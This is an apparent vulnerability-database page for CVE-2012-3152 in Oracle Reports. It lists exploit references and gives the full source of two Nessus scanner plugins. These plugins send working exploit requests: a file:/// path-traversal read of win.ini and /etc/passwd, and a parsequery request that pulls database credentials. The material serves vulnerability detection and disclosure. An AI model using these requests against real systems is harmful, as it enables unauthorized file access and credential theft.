Vulnerabilities > CVE-2012-3152 - Unspecified vulnerability in Oracle Fusion Middleware 11.1.1.4.0/11.1.1.6.0/11.1.2.0

047910
CVSS 9.1 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
NONE
network
low complexity
oracle
critical
nessus
exploit available
metasploit

Summary

Unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. NOTE: the previous information is from the October 2012 CPU. Oracle has not commented on claims from the original researcher that the URLPARAMETER functionality allows remote attackers to read and upload arbitrary files to reports/rwservlet, and that this issue occurs in earlier versions. NOTE: this can be leveraged with CVE-2012-3153 to execute arbitrary code by uploading a .jsp file.

Exploit-Db

  • descriptionOracle Forms and Reports Remote Code Execution. CVE-2012-3152. Remote exploit for windows platform
    idEDB-ID:31737
    last seen2016-02-03
    modified2014-02-18
    published2014-02-18
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/31737/
    titleOracle Forms and Reports - Remote Code Execution
  • descriptionOracle Forms and Reports 11.1 - Remote Exploit. CVE-2012-3152. Remote exploit for jsp platform
    fileexploits/jsp/remote/31253.rb
    idEDB-ID:31253
    last seen2016-02-03
    modified2014-01-29
    platformjsp
    port80
    published2014-01-29
    reporterMekanismen
    sourcehttps://www.exploit-db.com/download/31253/
    titleOracle Forms and Reports 11.1 - Remote Exploit
    typeremote

Metasploit

descriptionThis module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution on the host. The showenv url can be used to disclose information about a server. A second vulnerability that allows arbitrary reading and writing to the host filesystem can then be used to write a shell from a remote url to a known local path disclosed from the previous vulnerability. The local path being accessible from an URL allows an attacker to perform the remote code execution using, for example, a .jsp shell. This module was tested successfully on Windows and Oracle Forms and Reports 10.1.
idMSF:EXPLOIT/MULTI/HTTP/ORACLE_REPORTS_RCE
last seen2020-06-05
modified2017-08-29
published2014-01-30
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_reports_rce.rb
titleOracle Forms and Reports Remote Code Execution

Nessus

  • NASL familyCGI abuses
    NASL idORACLE_REPORTS_PASSWORD_DISCLOSURE.NASL
    descriptionNessus was able to exploit a flaw in the Oracle Reports servlet parsequery function, and was able to retrieve the plaintext database credentials for one or more users. A remote attacker can exploit this vulnerability to gain unauthorized database access.
    last seen2020-06-01
    modified2020-06-02
    plugin id73120
    published2014-03-20
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73120
    titleOracle Reports Servlet Parsequery Function Remote Database Credentials Exposure
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73120);
      script_version("1.8");
      script_cvs_date("Date: 2019/11/26");
    
      script_cve_id("CVE-2012-3153");
      script_bugtraq_id(55961);
      script_xref(name:"EDB-ID", value:"31253");
    
      script_name(english:"Oracle Reports Servlet Parsequery Function Remote Database Credentials Exposure");
      script_summary(english:"Tries to exploit remote database credential exposure vulnerability");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote host is running a web application that exposes database
    credentials.");
      script_set_attribute(attribute:"description", value:
    "Nessus was able to exploit a flaw in the Oracle Reports servlet
    parsequery function, and was able to retrieve the plaintext database
    credentials for one or more users. A remote attacker can exploit this
    vulnerability to gain unauthorized database access.");
      # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f");
      # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch per the vendor's advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3153");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_reports_detect.nbin");
      script_require_keys("www/oracle_reports");
      script_require_ports("Services/www", 8888);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("data_protection.inc");
    
    appname = "Oracle Reports";
    
    port = get_http_port(default:8888);
    
    install = get_install_from_kb(
      appname:'oracle_reports',
      port:port,
      exit_on_fail:TRUE
    );
    
    # try and obtain a list of keymaps
    show_keymaps_uri = install['dir'] + '/rwservlet/showmap';
    
    res = http_send_recv3(method:"GET",
                          item:show_keymaps_uri,
                          port:port,
                          exit_on_fail:TRUE);
    
    
    if ("Reports Servlet Key Map" >!< res[2]) exit(0, "Unable to access Oracle Reports showmap function via "+build_url(port:port, qs:show_keymaps_uri)+".");
    
    lines = split(res[2], sep:'\n', keep:FALSE);
    
    count = 0;
    
    custom_keymaps = make_list();
    
    ignorable_keymaps = make_list(
      '%ENV_NAME%',
      'barcodepaper',
      'barcodeweb',
      'breakbparam',
      'charthyperlink_ias',
      'charthyperlink_ids',
      'distributionpaper',
      'express',
      'orqa',
      'parmformjsp',
      'pdfenhancements',
      'report_defaultid',
      'report_secure',
      'run',
      'runp',
      'tutorial',
      'xmldata'
    );
    
    # get a list of non-default custom keymaps
    foreach line (lines)
    {
      if ("OraInstructionText" >!< line) continue;
    
      # table contains name the value, we want to skip over the values
      count++;
      if (!(count%2)) continue;
    
      item = eregmatch(pattern:"OraInstructionText>([^<]+)<", string:line);
      if (!isnull(item) && !isnull(item[1]))
      {
        keymap = chomp(item[1]);
    
        ignore = FALSE;
        foreach map (ignorable_keymaps)
          if (map == keymap) ignore = TRUE;
        if (!ignore)
          custom_keymaps = make_list(custom_keymaps, keymap);
      }
    }
    
    if (max_index(custom_keymaps) == 0) exit(0, "Failed to access Oracle Reports showmap function at "+build_url(port:port, qs:show_keymaps_uri)+".");
    
    report = '';
    
    parsequery_uri = install['dir'] + '/rwservlet/parsequery?';
    
    foreach map (custom_keymaps)
    {
      res = http_send_recv3(method:"GET",
                            item:parsequery_uri + map,
                            port:port,
                            exit_on_fail:TRUE);
    
      item = eregmatch(pattern:"userid=([^/]+)/([^@]+)@([^ \t]+)([ \t]|$)",
                       string:res[2]);
      if (!isnull(item) && !isnull(item[1]) && !isnull(item[2]) && !isnull(item[3]))
      {
        pass = chomp(item[2]);
    
        # mask actual password except for first and last characters.
        if (strlen(pass) < 2) pass = crap(data:'*', length:6);
        else pass = strcat(pass[0], crap(data:'*', length:6), pass[strlen(pass)-1]);
    
        report += '\n  Username : ' + data_protection::sanitize_user_enum(users:chomp(item[1])) +
                  '\n  Password : ' + pass +
                  '\n  Database : ' + chomp(item[3]) + '\n';
      }
    }
    
    if (report != '')
    {
      report = '\nNessus was able to enumerate the following logins : \n' + report;
      if (report_verbosity > 0) security_warning(port:port, extra:report);
      else security_warning(port);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, "Oracle Reports", build_url(port:port, qs:install['dir'] + '/rwservlet'));
    
  • NASL familyCGI abuses
    NASL idORACLE_REPORTS_FILE_ACCESS.NASL
    descriptionNessus was able to exploit a file access vulnerability in the Oracle Reports servlet and retrieve to contents of a file. A remote attacker could use this vulnerability to read or write arbitrary files on the system, ultimately leading to remote code execution.
    last seen2020-03-18
    modified2014-03-20
    plugin id73119
    published2014-03-20
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73119
    titleOracle Reports Servlet Remote File Access
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(73119);
      script_version("1.9");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/26");
    
      script_cve_id("CVE-2012-3152");
      script_bugtraq_id(55955);
      script_xref(name:"EDB-ID", value:"31253");
    
      script_name(english:"Oracle Reports Servlet Remote File Access");
      script_summary(english:"Tries to read a file");
    
      script_set_attribute(attribute:"synopsis", value:
    "The remote web server hosts a web application that has a file access
    vulnerability.");
      script_set_attribute(attribute:"description", value:
    "Nessus was able to exploit a file access vulnerability in the Oracle
    Reports servlet and retrieve to contents of a file.  A remote attacker
    could use this vulnerability to read or write arbitrary files on the
    system, ultimately leading to remote code execution.");
      # http://blog.netinfiltration.com/2013/11/03/oracle-reports-cve-2012-3152-and-cve-2012-3153/
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?c969a07f");
      # https://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?87547c81");
      script_set_attribute(attribute:"solution", value:
    "Apply the appropriate patch per the vendor's advisory.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
      script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2012-3152");
    
      script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
      script_set_attribute(attribute:"exploit_available", value:"true");
      script_set_attribute(attribute:"exploit_framework_core", value:"true");
      script_set_attribute(attribute:"exploited_by_nessus", value:"true");
      script_set_attribute(attribute:"metasploit_name", value:'Oracle Forms and Reports Remote Code Execution');
      script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"patch_publication_date", value:"2012/10/16");
      script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/20");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:oracle:fusion_middleware");
      script_end_attributes();
    
      script_category(ACT_ATTACK);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("oracle_reports_detect.nbin");
      script_require_keys("www/oracle_reports");
      script_require_ports("Services/www", 8888);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("webapp_func.inc");
    include("data_protection.inc");
    
    appname = "Oracle Reports";
    
    port = get_http_port(default:8888);
    
    install = get_install_from_kb(
      appname:'oracle_reports',
      port:port,
      exit_on_fail:TRUE
    );
    
    vuln_script = install['dir'] + '/rwservlet';
    
    traversal = mult_str(str:"../", nb:15);
    
    file_list = make_list(traversal + "windows/win.ini",
                          traversal + "winnt/win.ini",
                          "c:/windows/win.ini",
                          "c:/winnt/win.ini",
                          "/etc/passwd");
    
    exploit_request = NULL;
    exploit_response = NULL;
    
    foreach file (file_list)
    {
      exploit = vuln_script + "?destype=cache&desformat=html&JOBTYPE=rwurl&URLPARAMETER=%22file:///" + file + "%22";
      res = http_send_recv3(method:"GET",
                            item:exploit,
                            port:port,
                            exit_on_fail:TRUE);
    
      if (
        # windows platforms
        (
          "win.ini" >< file &&
          (
           "[Mail]" >< res[2] ||
           "[fonts]" >< res[2] ||
           "; for 16-bit app support" >< res[2]
          )
        ) ||
        # *nix
        (
          "passwd" >< file &&
          res[2] =~ " root:.*:0:[01]:"
        )
      )
      {
        exploit_request = exploit;
        exploit_response = chomp(res[2]);
        break;
      }
    }
    
    if (!isnull(exploit_request))
    {
      report = NULL;
      filename = NULL;
      output = NULL;
      request = NULL;
      exploit_request = build_url(port:port, qs:exploit_request);
    
      if (report_verbosity > 0)
      {
        report =
          '\n' + 'Nessus was able to exploit the vulnerability with the following' +
          '\n' + 'request :' +
          '\n' +
          '\n' + '  ' + exploit_request + '\n';
    
        if (report_verbosity > 1)
        {
          output = data_protection::redact_etc_passwd(output:exploit_response);
          filename = "win.ini";
          if ("passwd" >< file) filename = "/etc/passwd";
          request = make_list(req);
        }
      }
    
      security_report_v4(port:port,
                         extra:report,
                         severity:SECURITY_WARNING,
                         request:request,
                         file:filename,
                         output:output);
    
      exit(0);
    }
    else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));
    

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/125236/oracle_reports_rce.rb.txt
idPACKETSTORM:125236
last seen2016-12-05
published2014-02-18
reporterMekanismen
sourcehttps://packetstormsecurity.com/files/125236/Oracle-Forms-Reports-Remote-Code-Execution.html
titleOracle Forms / Reports Remote Code Execution

Seebug

  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:85052
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-85052
    titleOracle Forms and Reports - Remote Code Execution
  • bulletinFamilyexploit
    descriptionNo description provided by source.
    idSSV:84591
    last seen2017-11-19
    modified2014-07-01
    published2014-07-01
    reporterRoot
    sourcehttps://www.seebug.org/vuldb/ssvid-84591
    titleOracle Forms and Reports 11.1 - Remote Exploit